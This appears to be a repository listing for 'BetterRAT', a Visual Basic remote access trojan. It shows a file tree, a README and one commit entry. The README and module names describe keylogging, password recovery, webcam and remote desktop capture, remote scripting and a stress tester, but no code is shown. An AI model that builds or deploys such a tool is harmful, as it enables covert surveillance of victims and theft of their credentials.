======================: FILES :======================
BetterRAT
├── app.config
├── Artdesigner-My-Secret-Diamond.ico
├── Audio.Designer.vb
├── Audio.resx
├── Audio.vb
├── Codeplex TabControl.vb
├── Connection.vb
├── DotNetTabcontrol.vb
├── Encryption.vb
├── Form1.Designer.vb
├── Form1.resx
├── Form1.vb
├── FunManager.Designer.vb
├── FunManager.resx
├── FunManager.vb
├── Infinity.sln
├── Infinity.vbproj
├── Keylogger.Designer.vb
├── Keylogger.resx
├── Keylogger.vb
├── LICENSE
├── MapView.Designer.vb
├── MapView.resx
├── MapView.vb
├── Misc.Designer.vb
├── Misc.resx
├── Misc.vb
├── My Project
│   ├── Application.Designer.vb
│   ├── Application.myapp
│   ├── app.manifest
│   ├── AssemblyInfo.vb
│   ├── Resources.Designer.vb
│   ├── Resources.resx
│   ├── Settings.Designer.vb
│   └── Settings.settings
├── newfile.Designer.vb
├── newfile.resx
├── newfile.vb
├── paswdrec.Designer.vb
├── paswdrec.resx
├── paswdrec.vb
├── Pool.vb
├── RAT.zip
├── README.md
├── RemoteChat.Designer.vb
├── RemoteChat.resx
├── RemoteChat.vb
├── RemoteDesktop.Designer.vb
├── RemoteDesktop.resx
├── RemoteDesktop.vb
├── RemoteWebcam.Designer.vb
├── RemoteWebcam.resx
├── RemoteWebcam.vb
├── Resources
│   ├── 483.GIF
│   ├── 488.GIF
│   ├── arrow-270.png
│   ├── document--arrow.png
│   ├── folder--arrow.png
│   ├── greenball.png
│   ├── notify.wav
│   ├── play.png
│   └── redball.png
├── Scripting.Designer.vb
├── Scripting.resx
├── Scripting.vb
├── ShowMsgBox.Designer.vb
├── ShowMsgBox.resx
├── ShowMsgBox.vb
├── sourrrce.txt
├── StressTester.Designer.vb
├── StressTester.resx
├── StressTester.vb
├── stub.txt
├── SystemInformation.Designer.vb
├── SystemInformation.resx
├── SystemInformation.vb
├── Thumbnails.Designer.vb
├── Thumbnails.resx
├── Thumbnails.vb
└── ThumbNail.vb

2 directories, 80 files
======================: README CONTENT :======================
# Information
BetterRAT is InfinityRAT(DiamondRAT) Based Next Generation RAT
#### All responsibilities are at your own risk.
#### Please use it only for research purposes.
# Feature
* Remote Desktop
* Remote Connection Controller
* Remote Keylogger
* Remote File Manager
* Remote TaskManager
* Remote Script
====================== GIT HISTORY: ======================
4b7fc2c HEAD@{0}: clone: from https://github.com/mwsrc/BetterRAT
commit 4b7fc2c8172b012c9798f32f41d34a7c10a094e1
Author: Doge <lovely-doge@protonmail.com>
Date:   Sat Dec 24 16:52:21 2016 +0900

    README
